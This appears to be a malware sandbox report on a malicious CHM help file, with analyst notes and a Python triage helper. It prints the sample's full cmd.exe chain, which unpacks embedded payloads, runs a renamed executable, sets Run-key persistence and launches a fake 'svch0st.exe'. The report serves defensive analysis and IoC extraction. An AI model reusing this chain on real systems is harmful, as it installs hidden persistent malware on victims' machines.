Analysis
-
max time kernel
29s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system -
submitted
16-03-2023 03:22
Static task
static1
Behavioral task
behavioral1
Sample
virus/meitu.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
virus/meitu.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
virus/白加黑衍生物/UpgradeShow.dll (directory name translates to "white-plus-black derivatives"; 白加黑, "white plus black", is the Chinese term for DLL side-loading: a benign signed EXE loading a malicious DLL)
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
virus/白加黑衍生物/UpgradeShow.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win10v2004-20230220-en
General
-
Target
virus/meitu.chm
-
Size
1.2MB
-
MD5
3dbfbb912f430ae62df647a767a86884
-
SHA1
0604930ef6eef2e10ae38e9b89d819ecda25f847
-
SHA256
8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1
-
SHA512
984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d
-
SSDEEP
24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl
Malware Config
Signatures
-
Modifies Internet Explorer settings
Processes:
process: hh.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Internet Explorer\Main | hh.exe
Note: hh.exe renders CHM content with the MSHTML (Internet Explorer) engine, so creation of this key is expected whenever a CHM file is opened and is not on its own an indicator of malicious activity.
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
1036 | hh.exe
1036 | hh.exe
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
description | pid | process | target process
PID 1036 wrote to memory of 268 | 1036 | hh.exe | conhost.exe
PID 1036 wrote to memory of 268 | 1036 | hh.exe | conhost.exe
PID 1036 wrote to memory of 268 | 1036 | hh.exe | conhost.exe
Note: all three writes go from hh.exe into the child it has just spawned (PID 268). A parent writing into a freshly created child's address space is part of ordinary process creation on Windows, so here this signature records the CHM launching its command chain, not code injection into an unrelated process.
Processes
-
C:\Windows\hh.exe (PID 1036, depth 1)
Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\System32\conhost.exe (PID 268, depth 2, child of hh.exe)
Command line: "C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"
PID:268
The chain, stage by stage (split on &, which cmd.exe uses to run commands one after another regardless of the previous exit status):
1. hh -decompile C:\ProgramData\echelp ./meitu.chm: the CHM uses the HTML Help viewer's own -decompile switch to unpack its embedded files into C:\ProgramData\echelp, so the payloads are carried inside the help file and no downloader is needed.
2. ping 127.0.0.1 -n 1 >nul: the usual batch-file delay idiom (ping -n N to localhost pauses roughly N-1 seconds; with -n 1 the pause is near zero and mainly sequences the stages). It recurs three times in the chain.
3. C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\: a file with a .mht (web archive) extension is executed directly with arguments, so it is a renamed executable. The x verb and -O- switch look like an archive-extraction tool unpacking introducziPn.mht into the same directory, but the report does not identify the tool.
4. start C:\ProgramData\echelp\duankai.lnk: runs a dropped shortcut.
5. reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\ProgramData\echelp\svch0st.exe" /f: persistence through the per-user Run key, under a value name chosen to look like Windows Update.
6. start C:\ProgramData\echelp\svch0st.exe: launches the dropped executable. Note the zero in place of the o in svchost, and the location: the real svchost.exe lives in C:\Windows\System32, never in ProgramData. The same file name, together with UpgradeShow.dll, appears under the 白加黑衍生物 ("white-plus-black derivatives", the Chinese term for DLL side-loading) directory of this submission; those are separate tasks whose behaviour is not shown on this page.
7. start C:\ProgramData\echelp\ipconfig.lnk: runs a second dropped shortcut.
8. taskkill /f /t /im hh.exe: force-kills the help viewer and its process tree, closing the window that opened the CHM.
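The command chain recorded in the conhost.exe/cmd entry above, as an added triage example (this is not output of the sandbox or code from the sample): a small Python helper that splits a cmd.exe chain on & outside double quotes, strips nested cmd /C wrappers, and tags each stage (self-decompile via hh, ping delay, Run-key persistence, a renamed binary executed under a non-executable extension, start of dropped files, taskkill of the viewer), then collapses the findings into file and autorun IoCs. The command line is copied from the report with its escaped quotes unescaped; the technique labels and function names are this example's own choices.

```python
"""Added triage helper (not part of the sandbox report): split the cmd.exe
chain recorded in the process tree into stages and tag what each stage does.
Technique labels and function names are this example's own choices."""
import ntpath
import re

# Command line copied from the conhost.exe/cmd entry of the report (the
# backslash-escaped quotes of the outer quoted string are unescaped here).
CMDLINE = (
    'cmd /C hh -decompile C:\\ProgramData\\echelp ./meitu.chm'
    '&ping 127.0.0.1 -n 1 >nul'
    '&cmd /C C:\\ProgramData\\echelp\\system_wiNuirements.mht x '
    'C:\\ProgramData\\echelp\\introducziPn.mht -O- C:\\ProgramData\\echelp\\'
    '&ping 127.0.0.1 -n 1 >nul'
    '&start C:\\ProgramData\\echelp\\duankai.lnk'
    '&cmd /C reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'
    ' /v WindowsUpdate /t REG_SZ /d "C:\\ProgramData\\echelp\\svch0st.exe" /f'
    '&ping 127.0.0.1 -n 1 >nul'
    '&start C:\\ProgramData\\echelp\\svch0st.exe'
    '&start C:\\ProgramData\\echelp\\ipconfig.lnk'
    '&taskkill /f /t /im hh.exe'
)

_WRAPPER = re.compile(r'^cmd(?:\.exe)?\s+/[ck]\s+', re.IGNORECASE)
_WIN_PATH = re.compile(r'[A-Za-z]:\\[^\s"&]+')
# Extensions Windows normally runs as programs; anything else executed as a
# command is a renamed binary hiding behind a harmless-looking suffix.
_EXEC_EXT = {'.exe', '.com', '.bat', '.cmd', '.scr', '.pif', '.lnk'}


def split_chain(cmdline):
    """Split on & and && outside double quotes. cmd.exe also chains on | and ||
    and honours ^ escapes; neither occurs in this sample, so they are ignored."""
    stages, buf, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            quoted = not quoted
        elif ch == '&' and not quoted:
            stages.append(''.join(buf).strip())
            buf = []
            i += 2 if cmdline.startswith('&&', i) else 1
            continue
        buf.append(ch)
        i += 1
    stages.append(''.join(buf).strip())
    return [s for s in stages if s]


def unwrap(stage):
    """Strip any number of nested 'cmd /C' or 'cmd /K' wrappers."""
    while True:
        m = _WRAPPER.match(stage)
        if not m:
            return stage
        stage = stage[m.end():]


def classify(stage):
    """Return a finding dict describing one stage of the chain."""
    cmd = unwrap(stage)
    tokens = cmd.split()
    verb = tokens[0].lower()
    finding = {'raw': stage, 'paths': _WIN_PATH.findall(cmd)}
    if verb in ('hh', 'hh.exe') and len(tokens) >= 4 and tokens[1].lower() == '-decompile':
        finding.update(technique='chm-self-decompile', output_dir=tokens[2], chm=tokens[3])
    elif verb == 'ping' and '127.0.0.1' in tokens:
        n = int(tokens[tokens.index('-n') + 1]) if '-n' in tokens else 4  # ping's default count
        finding.update(technique='delay-via-ping', count=n)
    elif verb == 'reg' and len(tokens) > 2 and tokens[1].lower() == 'add':
        key = tokens[2]
        value = re.search(r'/v\s+(\S+)', cmd, re.IGNORECASE)
        data = re.search(r'/d\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
        autorun = key.lower().rstrip('\\').endswith(('\\run', '\\runonce'))
        finding.update(
            technique='registry-run-persistence' if autorun else 'registry-write',
            key=key,
            value=value.group(1) if value else None,
            data=(data.group(1) or data.group(2)) if data else None,
        )
    elif verb == 'start' and len(tokens) > 1:
        target = tokens[1]
        kind = 'shortcut' if target.lower().endswith('.lnk') else 'file'
        finding.update(technique='launch-' + kind, target=target)
    elif verb == 'taskkill':
        image = re.search(r'/im\s+(\S+)', cmd, re.IGNORECASE)
        finding.update(technique='kill-process', image=image.group(1) if image else None)
    else:
        ext = ntpath.splitext(tokens[0])[1].lower()
        masq = ext and ext not in _EXEC_EXT
        finding.update(technique='execute-masqueraded-extension' if masq else 'execute',
                       program=tokens[0], args=tokens[1:])
    return finding


def triage(cmdline):
    return [classify(s) for s in split_chain(cmdline)]


def iocs(findings):
    """Collapse findings into file paths and autorun entries worth hunting for."""
    files = sorted({p.rstrip('\\') for f in findings for p in f['paths']})
    persistence = [{'key': f['key'], 'value': f['value'], 'data': f['data']}
                   for f in findings if f['technique'] == 'registry-run-persistence']
    return {'files': files, 'persistence': persistence}


if __name__ == '__main__':
    found = triage(CMDLINE)
    for i, f in enumerate(found, 1):
        print(f"{i:2d}. {f['technique']:32s} {f['raw']}")
    print(iocs(found))
```

Running it on the report's command line yields ten stages: the hh -decompile step, three ping delays, the .mht file run as a program (flagged as a masqueraded extension), two shortcut launches, the Run-key write (flagged as persistence with value WindowsUpdate pointing at C:\ProgramData\echelp\svch0st.exe), the launch of svch0st.exe, and the taskkill of hh.exe. The iocs() output is the hunt list for the host: six paths under C:\ProgramData\echelp and one HKCU Run value.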